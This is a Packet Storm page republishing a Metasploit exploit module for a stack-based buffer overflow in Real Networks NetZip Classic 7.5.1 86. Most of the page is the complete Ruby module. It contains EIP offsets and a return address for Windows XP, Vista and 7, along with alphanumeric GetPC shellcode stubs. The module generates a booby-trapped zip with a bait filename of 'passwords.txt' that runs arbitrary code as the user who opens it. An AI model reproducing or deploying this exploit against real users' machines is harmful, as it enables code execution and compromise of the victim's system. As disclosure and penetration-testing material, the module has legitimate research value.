what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Real Networks Netzip Classic 7.5.1 86 Buffer Overflow

Real Networks Netzip Classic 7.5.1 86 Buffer Overflow
Posted Oct 17, 2011
Authored by TecR0c, C4SS!0 G0M3S | Site metasploit.com

This Metasploit module exploits a stack-based buffer overflow vulnerability in version 7.5.1 86 of Real Networks Netzip Classic. In order for the command to be executed, an attacker must convince someone to load a specially crafted zip file with NetZip Classic. By doing so, an attacker can execute arbitrary code as the victim user.

tags | exploit, overflow, arbitrary
SHA-256 | 7c9d830274420e19564984899e0366cab20392b76e994a6b0e384e9de02b5a0a

Real Networks Netzip Classic 7.5.1 86 Buffer Overflow

Change Mirror Download
##
# $Id: real_networks_netzip_bof.rb 13952 2011-10-16 15:47:04Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
version 7.5.1 86 of Real Networks Netzip Classic.
In order for the command to be executed, an attacker must convince someone to
load a specially crafted zip file with NetZip Classic.
By doing so, an attacker can execute arbitrary code as the victim user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'C4SS!0 G0M3S', # Vulnerability discovery and original exploit
'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
],
'Version' => '$Revision: 13952 $',
'References' =>
[
[ 'BID', '46059' ],
[ 'URL', 'http://proforma.real.com' ],
[ 'URL', 'http://www.exploit-db.com/exploits/16083/' ],
],
'Platform' => [ 'win' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
'DisableNops' => true,
'EncoderOptions' =>
{
'BufferRegister' => 'ESI'
}
},
'Targets' =>
[
[
'Windows XP SP3',
{
'Offset' => 247, # To EIP
'Ret' => 0x10061cf9, # PUSH ESP # RETN 08 - NPSYSTEM.dll 7.5.1.86
'Max' => 2000, # Max buffer size
}
],

[
'Windows 7/Windows Vista',
{
'Offset' => 248, # To EIP
'Ret' => 0x10061cf9, # PUSH ESP # RETN 08 - NPSYSTEM.dll 7.5.1.86
'Max' => 2000, # Max buffer size
}
],
],
'DisclosureDate' => 'Jan 30 2011',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
OptString.new('CONTENTNAME', [ true, 'Name of the fake zipped file', 'passwords.txt']),
], self.class)

end

def exploit

buffer = "#{datastore['CONTENTNAME']}"
buffer << ' ' * (target['Offset']-buffer.length)
buffer << [target.ret].pack('V')
buffer << make_nops(8)

# GetPC - Non ascii characters get converted
buffer << "\x89\x05" #jmp short (5 bytes) to 'jmp back' at end
buffer << "\x5e" #pop esi
buffer << "\x41" #nop (inc ecx)
buffer << "\x98\x99" #call esi
buffer << "\x41" #nop (inc ecx)
buffer << "\x8a\x94\x98\x98\x98" #jmp back to pop esi
buffer << payload.encoded
buffer << rand_text_alpha(target['Max']-buffer.length)

zip = Rex::Zip::Archive.new
xtra = [0xdac0ffee].pack('V')
comment = [0xbadc0ded].pack('V')
zip.add_file(buffer, xtra, comment)

# Create the file
print_status("Creating '#{datastore['FILENAME']}' file...")

file_create(zip.pack)
end

end
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close